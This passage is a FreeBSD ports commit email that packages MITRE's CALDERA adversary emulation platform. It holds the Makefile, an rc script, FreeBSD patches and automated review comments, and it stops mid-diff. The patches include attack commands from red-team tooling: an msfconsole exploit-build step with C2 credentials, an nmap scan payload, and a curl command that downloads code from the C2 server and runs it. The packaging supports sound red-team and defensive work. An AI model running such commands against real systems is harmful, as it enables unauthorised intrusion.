Date:      Sat, 29 Apr 2023 06:09:26 GMT
From:      Jose Alonso Cardenas Marquez <acm@FreeBSD.org>
To:        ports-committers@FreeBSD.org, dev-commits-ports-all@FreeBSD.org, dev-commits-ports-main@FreeBSD.org
Subject:   git: 84e20fa24498 - main - security/caldera: New port: Automated Adversary Emulation Platform
Message-ID:  <202304290609.33T69QrF017173@gitrepo.freebsd.org>

The branch main has been updated by acm:

URL: https://cgit.FreeBSD.org/ports/commit/?id=84e20fa24498f24ec36a846f4bb69cad07224937

commit 84e20fa24498f24ec36a846f4bb69cad07224937
Author:     Jose Alonso Cardenas Marquez <acm@FreeBSD.org>
AuthorDate: 2023-04-29 06:08:03 +0000
Commit:     Jose Alonso Cardenas Marquez <acm@FreeBSD.org>
CommitDate: 2023-04-29 06:08:03 +0000

    security/caldera: New port: Automated Adversary Emulation Platform
    
    CALDERA is a cyber security platform designed to easily automate adversary
    emulation, assist manual red-teams, and automate incident response.
    
    It is built on the MITRE ATT&CK framework and is an active research project
    at MITRE.
    
    The framework consists of two components:
    
    - The core system. This is the framework code, consisting of what is available
      in this repository. Included is an asynchronous command-and-control (C2)
      server with a REST API and a web interface.
    - Plugins. These repositories expand the core framework capabilities and
      provide additional functionality. Examples include agents, reporting,
      collections of TTPs and more.
---
 security/Makefile                                  |    1 +
 security/caldera/Makefile                          |   95 ++
 security/caldera/distinfo                          |   35 +
 security/caldera/files/caldera.in                  |   84 ++
 ...lities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml |   11 +
 ...hering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml |   11 +
 .../patch-plugins_access_data_payloads_scanner.sh  |   11 +
 .../files/patch-plugins_atomic_app_atomic__svc.py  |   11 +
 .../files/patch-plugins_emu_app_emu__svc.py        |   11 +
 .../patch-plugins_gameboard_app_gameboard__api.py  |   11 +
 .../files/patch-plugins_human_templates_human.html |   40 +
 ...ontrol_356d1722-7784-40c4-822b-0cf864b0b36d.yml |   33 +
 .../files/patch-plugins_manx_update-shells.sh      |   12 +
 ...ontrol_1837b43e-4fff-46b2-a604-a602f7540469.yml |   15 +
 ...ection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml |   11 +
 ...ection_3b4640bc-eacb-407a-a997-105e39788781.yml |   18 +
 ...ection_930236c2-5397-4868-8c7b-72e294a5a376.yml |   18 +
 ...ection_9bc10f37-0853-4d73-b547-019c11eda22f.yml |   18 +
 ...ection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml |   11 +
 ...unting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml |   11 +
 ...unting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml |   11 +
 ...unting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml |   11 +
 ...sponse_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml |   18 +
 ...sponse_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml |   18 +
 ...sponse_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml |   18 +
 ...sponse_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml |   18 +
 ...sponse_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml |   18 +
 ..._setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml |   11 +
 ..._setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml |   18 +
 ..._setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml |   18 +
 ..._setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml |   18 +
 ..._setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml |   18 +
 ..._setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml |   18 +
 ..._setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml |   11 +
 .../files/patch-plugins_sandcat_app_sand__svc.py   |   14 +
 ...ontrol_2f34977d-9558-4c12-abad-349716777c6b.yml |   45 +
 .../files/patch-plugins_sandcat_update-agents.sh   |   16 +
 ...gins_stockpile_app_obfuscators_base64__basic.py |   12 +
 ...ins_stockpile_app_obfuscators_base64__jumble.py |   12 +
 ...tockpile_app_obfuscators_base64__no__padding.py |   12 +
 ...ins_stockpile_app_obfuscators_caesar__cipher.py |   12 +
 ...gins_stockpile_app_obfuscators_steganography.py |   12 +
 ...ection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml |   11 +
 ...ection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml |   11 +
 ...ection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml |   18 +
 ...ection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml |   11 +
 ...ection_6469befa-748a-4b9c-a96d-f191fde47d89.yml |   11 +
 ...ection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml |   18 +
 ...ection_89955f55-529d-4d58-bed4-fed9e42515ec.yml |   11 +
 ...ection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml |   11 +
 ...ection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml |   11 +
 ...ontrol_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml |   15 +
 ...access_422526ec-27e9-429a-995b-c686a29561a4.yml |   12 +
 ...access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml |   13 +
 ...vasion_36eecb80-ede3-442b-8774-956e906aff02.yml |   11 +
 ...vasion_43b3754c-def4-4699-a673-1d85648fda6a.yml |   15 +
 ...vasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml |   17 +
 ...vasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml |   15 +
 ...covery_30732a56-4a23-4307-9544-09caf2ed29d5.yml |   11 +
 ...covery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml |   11 +
 ...covery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml |   11 +
 ...covery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml |   11 +
 ...covery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml |   17 +
 ...covery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml |   11 +
 ...covery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml |   12 +
 ...covery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml |   12 +
 ...covery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml |   11 +
 ...covery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml |   13 +
 ...covery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml |   11 +
 ...covery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml |   11 +
 ...covery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml |   10 +
 ...covery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml |   18 +
 ...covery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml |   11 +
 ...covery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml |   11 +
 ...covery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml |   13 +
 ...covery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml |   13 +
 ...covery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml |   11 +
 ...covery_c0da588f-79f0-4263-8998-7496b1a40596.yml |   11 +
 ...covery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml |   11 +
 ...covery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml |   11 +
 ...covery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml |   11 +
 ...covery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml |   20 +
 ...covery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml |   11 +
 ...cution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml |   11 +
 ...ration_0582dc26-e0cf-4645-88cf-f37a02279976.yml |   11 +
 ...ration_110cea7a-5b03-4443-92ee-7ccefaead451.yml |   18 +
 ...ration_2f90d4de-2612-4468-9251-b220e3727452.yml |   11 +
 ...ration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml |   18 +
 ...ration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml |   18 +
 ...ration_4a1120a5-971c-457f-bb07-60641b4723fd.yml |   11 +
 ...ration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml |   11 +
 ...ration_a201bec2-a193-4b58-bf0e-57fa621da474.yml |   18 +
 ...ration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml |   11 +
 ...ration_d754878c-17dd-46dc-891c-a993f8a10336.yml |   18 +
 ...ration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml |   18 +
 ...ration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml |   11 +
 ...impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml |   22 +
 ...impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml |   11 +
 ...impact_55f9600a-756f-496b-b27f-682052dc429c.yml |   11 +
 ...vement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml |   16 +
 ...vement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml |   15 +
 ...lation_10681f2f-be03-44af-858d-f2b0812df185.yml |   12 +
 ...aining_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml |   11 +
 ...aining_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml |   17 +
 ...aining_e13c4e45-d19f-440e-8a72-fad728a1789c.yml |   13 +
 ...aining_f0d77555-fa79-4884-8afd-73d39f887879.yml |   15 +
 ...aining_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml |   18 +
 .../caldera/files/patch-templates_abilities.html   |   11 +
 .../caldera/files/patch-templates_adversaries.html |   20 +
 security/caldera/files/patch-templates_agents.html |   32 +
 security/caldera/files/pkg-message.in              |   53 +
 security/caldera/pkg-descr                         |   14 +
 security/caldera/pkg-plist                         | 1283 ++++++++++++++++++++
 113 files changed, 3101 insertions(+)

diff --git a/security/Makefile b/security/Makefile
index 624766505d37..2c7b9d8c6644 100644
--- a/security/Makefile
+++ b/security/Makefile
@@ -62,6 +62,7 @@
     SUBDIR += bzrtp
     SUBDIR += ca_root_nss
     SUBDIR += caesarcipher
+    SUBDIR += caldera
     SUBDIR += calife
     SUBDIR += cardpeek
     SUBDIR += cargo-audit
diff --git a/security/caldera/Makefile b/security/caldera/Makefile
new file mode 100644
index 000000000000..8648038da272
--- /dev/null
+++ b/security/caldera/Makefile
@@ -0,0 +1,95 @@
+PORTNAME=	caldera
+DISTVERSION=	4.1.0
+CATEGORIES=	security python
+
+MAINTAINER=	acm@FreeBSD.org
+COMMENT=	Automated Adversary Emulation Platform
+WWW=		https://github.com/mitre/caldera
+
+LICENSE=	APACHE20
+LICENSE_FILE=	${WRKSRC}/LICENSE
+
+RUN_DEPENDS=	${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}yaml>0:devel/py-yaml@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}cryptography>0:security/py-cryptography@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \
+		${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \
+		upx>0:archivers/upx \
+		git>0:devel/git \
+		bash>0:shells/bash
+
+USE_GITHUB=	yes
+GH_ACCOUNT=	mitre
+GH_PROJECT=	${PORTNAME}
+GH_TUPLE=	mitre:access:fff4c20:access/plugins/access \
+		mitre:atomic:9e2c958:atomic/plugins/atomic \
+		mitre:builder:1aca019:builder/plugins/builder \
+		mitre:compass:fb88e02:compass/plugins/compass \
+		mitre:debrief:d815b60:debrief/plugins/debrief \
+		mitre:emu:5dbff82:emu/plugins/emu \
+		mitre:fieldmanual:510d0b9:fieldmanual/plugins/fieldmanual \
+		mitre:gameboard:3d98c32:gameboard/plugins/gameboard \
+		mitre:human:4368dea:human/plugins/human \
+		mitre:manx:e7205ea:manx/plugins/manx \
+		mitre:mock:4ea3337:mock/plugins/mock \
+		mitre:response:889213a:response/plugins/response \
+		mitre:sandcat:de3405f:sandcat/plugins/sandcat \
+		mitre:ssl:ac5bfcb:ssl/plugins/ssl \
+		mitre:stockpile:9662f27:stockpile/plugins/stockpile \
+		mitre:training:e309b0f:training/plugins/training
+
+USES=		go:run python:3.8+
+
+NO_ARCH=	yes
+NO_BUILD=	yes
+
+USE_RC_SUBR=	${PORTNAME:S/-/_/}
+SUB_FILES=	pkg-message
+SUB_LIST=	PYTHON_CMD=${PYTHON_CMD} \
+		WWWDIR=${WWWDIR}
+
+OPTIONS_DEFINE=	HAPROXY
+OPTIONS_DEFAULT=HAPROXY
+HAPROXY_DESC=	Support for HTTPS
+HAPROXY_RUN_DEPENDS=haproxy18>0:net/haproxy18
+
+post-extract:
+	${RM} -R ${WRKSRC}/.github
+	cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \
+		.git* .pre* .stylelintrc.json Dockerfile
+
+post-patch:
+	cd ${WRKSRC} && \
+		${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \;
+
+do-install:
+	@cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR}
+
+.include <bsd.port.mk>
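Review bot: HAPROXY_RUN_DEPENDS ties the default-on HAPROXY option ("Support for HTTPS") to the versioned net/haproxy18 port. If nothing in CALDERA requires the 1.8 branch specifically, depending on net/haproxy would let the TLS front end follow the ports tree's current HAProxy; if 1.8 is required, a comment next to the line saying why would help. A smaller style point in do-install: `${STAGEDIR}/${WWWDIR}` has a redundant slash, the usual form is `${STAGEDIR}${WWWDIR}`.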
diff --git a/security/caldera/distinfo b/security/caldera/distinfo
new file mode 100644
index 000000000000..d9ca85b369cf
--- /dev/null
+++ b/security/caldera/distinfo
@@ -0,0 +1,35 @@
+TIMESTAMP = 1681965363
+SHA256 (mitre-caldera-4.1.0_GH0.tar.gz) = 342516c29926dbd7e96bc2ba1558779d5ee423eac97a4c48d0245d7480a790eb
+SIZE (mitre-caldera-4.1.0_GH0.tar.gz) = 3462547
+SHA256 (mitre-access-fff4c20_GH0.tar.gz) = 087dd5de918c5a2a5a73888abb3839e6d43335ac5f26ee739038813631a24358
+SIZE (mitre-access-fff4c20_GH0.tar.gz) = 8485
+SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085
+SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142
+SHA256 (mitre-builder-1aca019_GH0.tar.gz) = 563c54beed985b11edb96c7ec3a8349f8328a6534750801fa71693ed1cf34346
+SIZE (mitre-builder-1aca019_GH0.tar.gz) = 7946
+SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16
+SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907
+SHA256 (mitre-debrief-d815b60_GH0.tar.gz) = 565e234e52157b6259752c474c40eaa96f15921595f299cbd7875f4bc51e73aa
+SIZE (mitre-debrief-d815b60_GH0.tar.gz) = 4419572
+SHA256 (mitre-emu-5dbff82_GH0.tar.gz) = 45b980caf2b9a59d1d9f4bba69334e1b74f036ae667bc510dfc1422ef58829d9
+SIZE (mitre-emu-5dbff82_GH0.tar.gz) = 16962
+SHA256 (mitre-fieldmanual-510d0b9_GH0.tar.gz) = d908a6f0eb4bf8295bc6c92e23aae5984bcd2006069af9ed880978b76c7c0984
+SIZE (mitre-fieldmanual-510d0b9_GH0.tar.gz) = 7811262
+SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a
+SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753
+SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a
+SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846
+SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470
+SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820
+SHA256 (mitre-mock-4ea3337_GH0.tar.gz) = 36447c30cdff3869796948bff8940b24e710f242e70255578095a10df4d0c5db
+SIZE (mitre-mock-4ea3337_GH0.tar.gz) = 5470
+SHA256 (mitre-response-889213a_GH0.tar.gz) = 4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee
+SIZE (mitre-response-889213a_GH0.tar.gz) = 24463
+SHA256 (mitre-sandcat-de3405f_GH0.tar.gz) = dbb111552220d6f108f852f3d442dcc90d3457c488fbec3f176a4638a611cd56
+SIZE (mitre-sandcat-de3405f_GH0.tar.gz) = 7564017
+SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12
+SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395
+SHA256 (mitre-stockpile-9662f27_GH0.tar.gz) = ab74994666c6759261346bb0c7a653dde5982273d04afd18eb26e7d57c78210c
+SIZE (mitre-stockpile-9662f27_GH0.tar.gz) = 4777470
+SHA256 (mitre-training-e309b0f_GH0.tar.gz) = 505d4d4447c9d35e2062064abe1d689f7bc92c818ccb450848e6e57619c24375
+SIZE (mitre-training-e309b0f_GH0.tar.gz) = 492099
diff --git a/security/caldera/files/caldera.in b/security/caldera/files/caldera.in
new file mode 100644
index 000000000000..aaedbb017d79
--- /dev/null
+++ b/security/caldera/files/caldera.in
@@ -0,0 +1,84 @@
+#!/bin/sh
+
+# PROVIDE: caldera
+# REQUIRE: NETWORKING
+# KEYWORD: shutdown
+#
+# Configuration settings for caldera in /etc/rc.conf:
+#
+# caldera_enable:          run caldera as service (default=NO)
+# caldera_flags:           additional flags for caldera server
+#
+
+. /etc/rc.subr
+
+name=caldera
+rcvar=caldera_enable
+
+load_rc_config ${name}
+
+export PATH="${PATH}:/usr/local/bin:/usr/local/sbin"
+
+: ${caldera_enable:=NO}
+: ${caldera_flags="--insecure"}
+
+caldera_user="www"
+
+pidfile="/var/run/${name}.pid"
+
+caldera_wwwdir="%%WWWDIR%%"
+python_command="%%PYTHON_CMD%%"
+python_script="${caldera_wwwdir}/server.py"
+start_cmd=${name}_start
+status_cmd=${name}_status
+stop_cmd=${name}_stop
+restart_cmd=${name}_restart
+extra_commands="status"
+
+caldera_start()
+{
+	if [ ! -f ${pidfile} ]
+	then
+		cd ${caldera_wwwdir} && \
+			daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o /var/log/caldera.log \
+				${python_command} ${python_script}  \
+				${caldera_flags}
+
+		echo "Starting ${name}"
+	else
+		echo "${name} is running as pid" `cat ${pidfile}`
+	fi
+}
+
+caldera_status()
+{
+        # If running, show pid
+	if [ -f ${pidfile} ]
+	then
+		echo "${name} is running as pid" `cat ${pidfile}`
+	else
+		echo "${name} is not running"
+	fi
+}
+
+caldera_stop()
+{
+	if [ -f ${pidfile} ]
+	then
+		kill `cat ${pidfile}`
+		rm ${pidfile}
+		echo "Stopping ${name}"
+	else
+		echo "${name} not running? (check ${pidfile})."
+	fi
+}
+
+caldera_restart()
+{
+        echo "Performing restart ${name}"
+        caldera_stop
+        sleep 3
+        caldera_start
+}
+
+run_rc_command "$1"
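Review bot: caldera_flags defaults to "--insecure" (`: ${caldera_flags="--insecure"}`), so an administrator who sets only caldera_enable=YES gets server.py started with that flag, while the header comment describes caldera_flags merely as "additional flags". Consider an empty default, or at least state the default and how to override it in the header comment. Separately, caldera_start, caldera_status and caldera_stop test only whether ${pidfile} exists: a stale file left behind after a crash blocks start and makes status report a pid that is no longer running. Checking that the process is alive, or setting command and pidfile and letting rc.subr do the process handling, would be more robust.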
diff --git a/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml
new file mode 100644
index 000000000000..c0bc8a3c91ed
--- /dev/null
+++ b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml
@@ -0,0 +1,11 @@
+--- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig	2021-10-01 14:07:40 UTC
++++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml
+@@ -7,7 +7,7 @@
+     name: Build or acquire exploits
+     attack_id: T1349
+   platforms:
+-    darwin,linux:
++    darwin,freebsd,linux:
+       sh:
+         command: |
+           msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red}
diff --git a/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml
new file mode 100644
index 000000000000..f7304f2ee2ad
--- /dev/null
+++ b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml
@@ -0,0 +1,11 @@
+--- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig	2021-10-01 14:07:40 UTC
++++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml
+@@ -7,7 +7,7 @@
+     name: Conduct active scanning
+     attack_id: T1254
+   platforms:
+-    darwin,linux:
++    darwin,freebsd,linux:
+       sh:
+         command: |
+           ./scanner.sh #{target.ip}
diff --git a/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh
new file mode 100644
index 000000000000..acdadfff6d43
--- /dev/null
+++ b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh
@@ -0,0 +1,11 @@
+--- plugins/access/data/payloads/scanner.sh.orig	2021-10-01 14:07:40 UTC
++++ plugins/access/data/payloads/scanner.sh
+@@ -1,5 +1,5 @@
+-#!/bin/bash
++#!/bin/sh
+ 
+ echo '[+] Starting basic NMAP scan'
+ nmap -Pn $1
+-echo '[+] Complete with module'
+\ No newline at end of file
++echo '[+] Complete with module'
diff --git a/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py
new file mode 100644
index 000000000000..abc3e67c6ccf
--- /dev/null
+++ b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py
@@ -0,0 +1,11 @@
+--- plugins/atomic/app/atomic_svc.py.orig	2022-08-11 15:59:49 UTC
++++ plugins/atomic/app/atomic_svc.py
+@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld
+ from app.utility.base_service import BaseService
+ from app.objects.c_agent import Agent
+ 
+-PLATFORMS = dict(windows='windows', macos='darwin', linux='linux')
++PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd')
+ EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh')
+ RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL)
+ PREFIX_HASH_LEN = 6
diff --git a/security/caldera/files/patch-plugins_emu_app_emu__svc.py b/security/caldera/files/patch-plugins_emu_app_emu__svc.py
new file mode 100644
index 000000000000..38eb16d85180
--- /dev/null
+++ b/security/caldera/files/patch-plugins_emu_app_emu__svc.py
@@ -0,0 +1,11 @@
+--- plugins/emu/app/emu_svc.py.orig	2022-06-12 20:12:01 UTC
++++ plugins/emu/app/emu_svc.py
+@@ -12,7 +12,7 @@ from app.utility.base_service import BaseService
+ 
+ 
+ class EmuService(BaseService):
+-    _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'}
++    _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'}
+ 
+     def __init__(self):
+         self.log = self.add_service('emu_svc', self)
diff --git a/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py
new file mode 100644
index 000000000000..7121866698a1
--- /dev/null
+++ b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py
@@ -0,0 +1,11 @@
+--- plugins/gameboard/app/gameboard_api.py.orig	2021-12-22 15:33:52 UTC
++++ plugins/gameboard/app/gameboard_api.py
+@@ -244,7 +244,7 @@ class GameboardApi(BaseService):
+         reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0]  #TODO: replace
+         ability_id = str(uuid.uuid4())
+         executors = []
+-        for pl in ['windows', 'darwin', 'linux']:
++        for pl in ['windows', 'darwin', 'linux', 'freebsd']:
+             reference_executor = reference_ability.find_executor('elasticsearch', pl)
+             if not reference_executor:
+                 continue
diff --git a/security/caldera/files/patch-plugins_human_templates_human.html b/security/caldera/files/patch-plugins_human_templates_human.html
new file mode 100644
index 000000000000..9bc604e58123
--- /dev/null
+++ b/security/caldera/files/patch-plugins_human_templates_human.html
@@ -0,0 +1,40 @@
+--- plugins/human/templates/human.html.orig	2022-09-06 17:33:12 UTC
++++ plugins/human/templates/human.html
+@@ -60,6 +60,7 @@
+                                 <select id="base-platform">
+                                     <option disabled="disabled" selected="">Select target OS</option>
+                                     <option value="darwin">MacOS</option>
++                                    <option value="freebsd">FreeBSD</option>
+                                     <option value="linux">Linux</option>
+                                     <option value="windows-psh">Windows (PowerShell)</option>
+                                 </select>
+@@ -257,6 +258,11 @@
+                     ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
+                     '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra;
+                 break;
++            case "freebsd":
++                baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' +
++                    ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
++                    '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra;
++                break;               
+             case "linux":
